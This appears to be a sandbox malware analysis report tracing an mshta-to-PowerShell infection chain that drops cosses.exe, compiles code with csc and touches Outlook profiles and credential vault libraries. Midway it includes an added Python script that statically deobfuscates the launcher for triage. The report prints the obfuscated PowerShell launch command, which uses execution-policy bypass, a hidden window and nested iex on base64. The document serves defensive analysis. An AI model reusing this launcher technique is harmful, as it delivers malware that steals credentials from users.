Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: d2d1.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dwrite.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cosses.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cosses.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cosses.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cosses.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cosses.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cosses.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cosses.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cosses.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cosses.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cosses.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cosses.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cosses.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeSection loaded: ieframe.dllJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeSection loaded: mlang.dllJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeSection loaded: winsqlite3.dllJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeSection loaded: vaultcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
                  Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: C:\Windows\SysWOW64\calc.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                  Source: Binary string: calc.pdbGCTL source: svchost.exe, 00000007.00000003.1651170470.000000000302B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1651036619.000000000301A000.00000004.00000020.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000B.00000003.1620980752.00000000006C4000.00000004.00000020.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000B.00000003.1620980752.00000000006C9000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: q8C:\Users\user\AppData\Local\Temp\fjq1drut\fjq1drut.pdb source: powershell.exe, 00000003.00000002.1482495416.0000000004B88000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdbUGP source: cosses.exe, 00000006.00000003.1469858707.0000000003FA0000.00000004.00001000.00020000.00000000.sdmp, cosses.exe, 00000006.00000003.1470158953.0000000004140000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1578771387.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1685711194.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1685711194.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1581466750.0000000003400000.00000004.00000020.00020000.00000000.sdmp, calc.exe, 0000000C.00000002.3817940779.000000000540E000.00000040.00001000.00020000.00000000.sdmp, calc.exe, 0000000C.00000003.1684130766.0000000004F0A000.00000004.00000020.00020000.00000000.sdmp, calc.exe, 0000000C.00000002.3817940779.0000000005270000.00000040.00001000.00020000.00000000.sdmp, calc.exe, 0000000C.00000003.1687074462.00000000050BC000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: calc.pdb source: svchost.exe, 00000007.00000003.1651170470.000000000302B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1651036619.000000000301A000.00000004.00000020.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000B.00000003.1620980752.00000000006C4000.00000004.00000020.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000B.00000003.1620980752.00000000006C9000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: cosses.exe, 00000006.00000003.1469858707.0000000003FA0000.00000004.00001000.00020000.00000000.sdmp, cosses.exe, 00000006.00000003.1470158953.0000000004140000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000007.00000003.1578771387.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1685711194.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1685711194.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1581466750.0000000003400000.00000004.00000020.00020000.00000000.sdmp, calc.exe, calc.exe, 0000000C.00000002.3817940779.000000000540E000.00000040.00001000.00020000.00000000.sdmp, calc.exe, 0000000C.00000003.1684130766.0000000004F0A000.00000004.00000020.00020000.00000000.sdmp, calc.exe, 0000000C.00000002.3817940779.0000000005270000.00000040.00001000.00020000.00000000.sdmp, calc.exe, 0000000C.00000003.1687074462.00000000050BC000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: hudFv7yP8kEYIbmJoqYH.exe, 0000000B.00000000.1602639905.000000000052F000.00000002.00000001.01000000.0000000A.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000000.1753260388.000000000052F000.00000002.00000001.01000000.0000000A.sdmp

                  Data Obfuscation

                  Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c powErshell.exE -ex bypAss -Nop -w 1 -C deViCeCredEnTiAldePLOymenT ; iEx($(Iex('[sYsTEm.TeXt.EncoDIng]'+[CHAR]0x3a+[ChaR]0X3A+'UTf8.gEtStrINg([SySteM.cOnvERT]'+[chAR]58+[ChAr]0X3a+'FromBAse64STriNg('+[Char]34+'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'+[Char]34+'))')))"
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powErshell.exE -ex bypAss -Nop -w 1 -C deViCeCredEnTiAldePLOymenT ; iEx($(Iex('[sYsTEm.TeXt.EncoDIng]'+[CHAR]0x3a+[ChaR]0X3A+'UTf8.gEtStrINg([SySteM.cOnvERT]'+[chAR]58+[ChAr]0X3a+'FromBAse64STriNg('+[Char]34+'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'+[Char]34+'))')))"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fjq1drut\fjq1drut.cmdline"
                  Source: C:\Users\user\AppData\Roaming\cosses.exe | Code function: 6_2_00114B37 LoadLibraryA,GetProcAddress, 6_2_00114B37
                  Source: C:\Users\user\AppData\Roaming\cosses.exe | Code function: 6_2_00138945 push ecx; ret 6_2_00138958
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_004018B1 push esi; iretd 7_2_004018F8
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_004018B1 push esi; iretd 7_2_00401962
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00401904 push esi; iretd 7_2_00401962
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00403110 push eax; ret 7_2_00403112
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00402993 push edx; retf 7_2_00402997
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00404B5E pushfd ; retf 7_2_00404B5F
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0040D38B push es; ret 7_2_0040D3AB
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00401646 push ss; ret 7_2_00401649
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00401623 push edi; ret 7_2_00401625
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00406FBC push D22ADE5Ch; retf 7_2_00406FC3
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0360135F push eax; iretd 7_2_03601369
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0360225F pushad ; ret 7_2_036027F9
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0360B008 push es; iretd 7_2_0360B009
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_036027FA pushad ; ret 7_2_036027F9
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03609939 push es; iretd 7_2_03609940
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_036309AD push ecx; mov dword ptr [esp], ecx 7_2_036309B6
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0360283D push eax; iretd 7_2_03602858
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe | Code function: 11_2_026BA3DA push D22ADE5Ch; retf 11_2_026BA3E1
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe | Code function: 11_2_026C962C push ss; ret 11_2_026C9632
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe | Code function: 11_2_026B7F7C pushfd ; retf 11_2_026B7F7D
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe | Code function: 11_2_026C07A9 push es; ret 11_2_026C07C9
                  Source: C:\Windows\SysWOW64\calc.exe | Code function: 12_2_052A09AD push ecx; mov dword ptr [esp], ecx 12_2_052A09B6
                  Source: C:\Windows\SysWOW64\calc.exe | Code function: 12_2_0323D700 push ebx; retf 12_2_0323D881
                  Source: C:\Windows\SysWOW64\calc.exe | Code function: 12_2_0323E536 pushad ; iretd 12_2_0323E54B
                  Source: C:\Windows\SysWOW64\calc.exe | Code function: 12_2_03231A4B pushfd ; retf 12_2_03231A4C
                  Source: C:\Windows\SysWOW64\calc.exe | Code function: 12_2_0324DAD0 push esi; retf 12_2_0324DADB
                  Source: C:\Windows\SysWOW64\calc.exe | Code function: 12_2_03233EA9 push D22ADE5Ch; retf 12_2_03233EB0
                  Source: C:\Windows\SysWOW64\calc.exe | Code function: 12_2_05006576 pushad ; ret 12_2_05006577
                  Source: C:\Windows\SysWOW64\calc.exe | Code function: 12_2_050057C6 push eax; iretd 12_2_050057C9
                  Source: C:\Windows\SysWOW64\calc.exe | Code function: 12_2_05004647 push edi; iretd 12_2_05004648
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\cosses.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\fjq1drut\fjq1drut.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\cosses[1].exe
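The powershell.exe command line recorded in this section never contains the decoder as plain text: it assembles `[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("..."))` at run time from single-quoted fragments glued to `[char]` casts (`[CHAR]0x3a`, `[chAR]58` for the two colons, `[Char]34` for the quotes), then hands the result to a nested `iex`. The script below is an editor-added Python example, not part of the Joe Sandbox report, showing how an analyst can fold that concatenation statically, pull the base64 argument out of the folded expression and decode the next stage without ever running PowerShell, plus the launch flags (`-ex bypass`, `-nop`, `-w 1`, nested `iex`) worth surfacing in an alert. The sample command line is constructed to mirror the observed one; because the report redacts the real base64 body, it is replaced by an inert string, so the decoded stage here is a placeholder and not the malware's second stage.

```python
import base64
import re
from typing import Optional

# Constructed sample (not the report's payload): same shape as the command line
# recorded in this section, with the redacted base64 body swapped for an inert string.
SAMPLE_PAYLOAD = base64.b64encode(b"Write-Host 'stage two placeholder'").decode()
SAMPLE_CMDLINE = (
    "powErshell.exE -ex bypAss -Nop -w 1 -C deViCeCredEnTiAldePLOymenT ; "
    "iEx($(Iex('[sYsTEm.TeXt.EncoDIng]'+[CHAR]0x3a+[ChaR]0X3A"
    "+'UTf8.gEtStrINg([SySteM.cOnvERT]'+[chAR]58+[ChAr]0X3a"
    "+'FromBAse64STriNg('+[Char]34+'" + SAMPLE_PAYLOAD + "'+[Char]34+'))')))"
)

# One fragment of a PowerShell concatenation: a single-quoted literal ('' is an
# escaped quote inside it) or a [char] cast of a decimal/hex number.
PIECE_RE = re.compile(r"'((?:[^']|'')*)'|\[char\]\s*(0x[0-9a-f]+|\d+)", re.IGNORECASE)
# The base64 argument once the quotes built from [char]34 are back in place.
B64_ARG_RE = re.compile(r'FromBase64String\("([A-Za-z0-9+/=]+)"\)', re.IGNORECASE)


def fold_concat(expr: str) -> str:
    """Statically evaluate 'literal' + [char]N + ... without invoking PowerShell.

    Only single-quoted literals and [char] casts are handled; double-quoted strings
    (which PowerShell would interpolate) and -f / -join tricks need a real parser.
    """
    out = []
    for literal, number in PIECE_RE.findall(expr):
        if number:
            out.append(chr(int(number, 0)))  # base 0 accepts both "58" and "0x3a"
        else:
            out.append(literal.replace("''", "'"))
    return "".join(out)


def decode_stage(cmdline: str) -> Optional[str]:
    """Return the UTF-8 text the inner Invoke-Expression would receive, or None."""
    folded = fold_concat(cmdline)
    match = B64_ARG_RE.search(folded)
    if not match:
        return None
    return base64.b64decode(match.group(1)).decode("utf-8", errors="replace")


def triage(cmdline: str) -> dict:
    """Launch flags and decoded content worth putting in an alert for this pattern."""
    return {
        "exec_policy_bypass": bool(re.search(r"-ex\w*\s+bypass", cmdline, re.I)),
        "no_profile": bool(re.search(r"-nop\w*", cmdline, re.I)),
        "hidden_window": bool(re.search(r"-w(?:indowstyle)?\s+(?:1|hidden)", cmdline, re.I)),
        "iex_count": len(re.findall(r"\biex\b|invoke-expression", cmdline, re.I)),
        "folded_expression": fold_concat(cmdline),
        "decoded_stage": decode_stage(cmdline),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_CMDLINE).items():
        print(f"{key}: {value}")
```

The folding step is what makes the rest possible: once the `[char]` pieces are resolved, the canonical `FromBase64String("...")` form reappears and a plain regex recovers the payload. On a real sample the decoded stage is where the dropped `cosses.exe` download and the `csc.exe` compilation listed above would be visible, so treat it as the next input to the same triage rather than the end of the chain.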

                  Hooking and other Techniques for Hiding and Protection

                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_001148D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,6_2_001148D7
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_00195376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,6_2_00195376
